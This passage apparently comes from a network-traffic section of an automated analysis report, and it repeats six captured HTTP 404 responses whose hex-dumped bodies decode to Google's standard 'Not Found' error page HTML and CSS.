65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
